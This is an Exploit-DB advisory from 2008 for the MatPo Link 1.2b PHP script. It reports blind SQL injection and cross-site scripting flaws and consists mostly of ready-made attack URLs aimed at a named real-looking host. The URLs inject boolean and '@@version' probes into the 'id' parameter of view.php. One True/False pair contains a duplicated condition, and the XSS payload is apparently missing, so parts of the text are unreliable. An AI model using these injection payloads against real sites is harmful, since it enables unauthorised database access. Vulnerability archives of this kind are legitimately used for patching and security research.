MatPo Link 1.2b Blind SQL Injection/XSS Multiple Vulnerabilities

2008-11-03T00:00:00
ID EDB-ID:6971
Type exploitdb
Reporter Hakxer
Modified 2008-11-03T00:00:00

Description

MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities. CVE-2008-6606,CVE-2008-6607. Webapps exploit for php platform

                                        
                                            ###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/       EgY Coders Vulnerability Research TM                                    

# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

|| Blind Sql Inj ||
 POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
  Exploit :
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
  
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
		
|| Cross Site Scripting ||
Poc:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]